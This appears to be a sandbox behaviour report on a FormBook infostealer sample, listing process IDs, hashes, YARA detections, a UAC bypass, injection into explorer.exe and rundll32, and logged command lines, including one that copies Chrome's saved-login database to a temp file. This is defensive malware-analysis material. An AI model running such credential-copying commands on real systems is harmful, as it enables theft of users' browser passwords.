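The share triple is the durable indicator here: the 1drv.com Location URL is a per-request signed link and changes between the two sessions, while cid, resid and authkey identify the hosted file and its anonymous share and stay constant.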



                                                                                                Target ID:0
                                                                                                Start time:20:12:05
                                                                                                Start date:08/08/2022
                                                                                                Path:C:\Users\user\Desktop\TR0627729920002.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\Desktop\TR0627729920002.exe"
                                                                                                Imagebase:0x400000
                                                                                                File size:938496 bytes
                                                                                                MD5 hash:8DBFE68662123710D83FEF939287D9A3
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:Borland Delphi
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source: 00000000.00000002.276683470.0000000002718000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.278080538.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.278080538.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.278080538.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.278080538.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                • Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source: 00000000.00000002.276153005.0000000002162000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Reputation:low

                                                                                                Target ID:5
                                                                                                Start time:20:12:20
                                                                                                Start date:08/08/2022
                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /k
                                                                                                Imagebase:0xc20000
                                                                                                File size:232960 bytes
                                                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.411833760.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.411833760.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.411833760.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.411833760.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.407639397.00000000036E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.407639397.00000000036E0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.407639397.00000000036E0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.407639397.00000000036E0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.407600284.00000000036B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.407600284.00000000036B0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.407600284.00000000036B0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.407600284.00000000036B0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.273665319.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000000.273665319.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.273665319.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.273665319.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.274126698.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000000.274126698.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.274126698.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.274126698.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.275130208.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000000.275130208.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.275130208.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.275130208.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.274615202.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000000.274615202.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.274615202.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.274615202.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                Reputation:high

                                                                                                Target ID:6
                                                                                                Start time:20:12:21
                                                                                                Start date:08/08/2022
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7c9170000
                                                                                                File size:625664 bytes
                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                Target ID:7
                                                                                                Start time:20:12:26
                                                                                                Start date:08/08/2022
                                                                                                Path:C:\Windows\explorer.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\Explorer.EXE
                                                                                                Imagebase:0x7ff6b8cf0000
                                                                                                File size:3933184 bytes
                                                                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.366747947.000000000D346000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000000.366747947.000000000D346000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.366747947.000000000D346000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.366747947.000000000D346000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.393025016.000000000D346000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000000.393025016.000000000D346000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.393025016.000000000D346000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.393025016.000000000D346000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                Reputation:high

                                                                                                Target ID:8
                                                                                                Start time:20:12:27
                                                                                                Start date:08/08/2022
                                                                                                Path:C:\Users\Public\Libraries\Jwjxmakrv.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\Public\Libraries\Jwjxmakrv.exe"
                                                                                                Imagebase:0x400000
                                                                                                File size:938496 bytes
                                                                                                MD5 hash:8DBFE68662123710D83FEF939287D9A3
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:Borland Delphi
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source: 00000008.00000002.326814708.0000000002868000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.328666768.000000000366B000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.328666768.000000000366B000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.328666768.000000000366B000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.328666768.000000000366B000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.329116862.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.329116862.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.329116862.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.329116862.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                Antivirus matches:
                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                • Detection: 29%, ReversingLabs
                                                                                                Reputation:low

                                                                                                Target ID:14
                                                                                                Start time:20:12:38
                                                                                                Start date:08/08/2022
                                                                                                Path:C:\Users\Public\Libraries\Jwjxmakrv.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\Public\Libraries\Jwjxmakrv.exe"
                                                                                                Imagebase:0x400000
                                                                                                File size:938496 bytes
                                                                                                MD5 hash:8DBFE68662123710D83FEF939287D9A3
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:Borland Delphi
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source: 0000000E.00000002.352406046.0000000000828000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Reputation:low

                                                                                                Target ID:19
                                                                                                Start time:20:12:43
                                                                                                Start date:08/08/2022
                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /k
                                                                                                Imagebase:0xc20000
                                                                                                File size:232960 bytes
                                                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                Target ID:21
                                                                                                Start time:20:12:44
                                                                                                Start date:08/08/2022
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7c9170000
                                                                                                File size:625664 bytes
                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                Target ID:23
                                                                                                Start time:20:12:57
                                                                                                Start date:08/08/2022
                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /k
                                                                                                Imagebase:0xc20000
                                                                                                File size:232960 bytes
                                                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                Target ID:24
                                                                                                Start time:20:12:58
                                                                                                Start date:08/08/2022
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7c9170000
                                                                                                File size:625664 bytes
                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                Target ID:29
                                                                                                Start time:20:13:21
                                                                                                Start date:08/08/2022
                                                                                                Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\rundll32.exe
Imagebase:0x1080000
File size:61952 bytes
MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001D.00000002.768343844.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001D.00000002.768343844.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001D.00000002.768343844.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000001D.00000002.768343844.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001D.00000002.773383896.0000000001020000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001D.00000002.773383896.0000000001020000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001D.00000002.773383896.0000000001020000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000001D.00000002.773383896.0000000001020000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001D.00000002.766540425.0000000000940000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001D.00000002.766540425.0000000000940000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001D.00000002.766540425.0000000000940000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000001D.00000002.766540425.0000000000940000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group

Target ID:30
Start time:20:13:27
Start date:08/08/2022
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:/c del "C:\Windows\SysWOW64\cmd.exe"
Imagebase:0xc20000
File size:232960 bytes
MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

Target ID:31
Start time:20:13:28
Start date:08/08/2022
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7c9170000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

Target ID:40
Start time:20:15:29
Start date:08/08/2022
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:/c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
Imagebase:0xc20000
File size:232960 bytes
MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

Target ID:41
Start time:20:15:31
Start date:08/08/2022
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7c9170000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

Target ID:46
Start time:20:15:53
Start date:08/08/2022
Path:C:\Program Files (x86)\P1bxx\IconCachet0hh.exe
Wow64 process (32bit):true
Commandline:C:\Program Files (x86)\P1bxx\IconCachet0hh.exe
Imagebase:0x3e0000
File size:232960 bytes
MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

Target ID:47
Start time:20:15:55
Start date:08/08/2022
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7c9170000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

No disassembly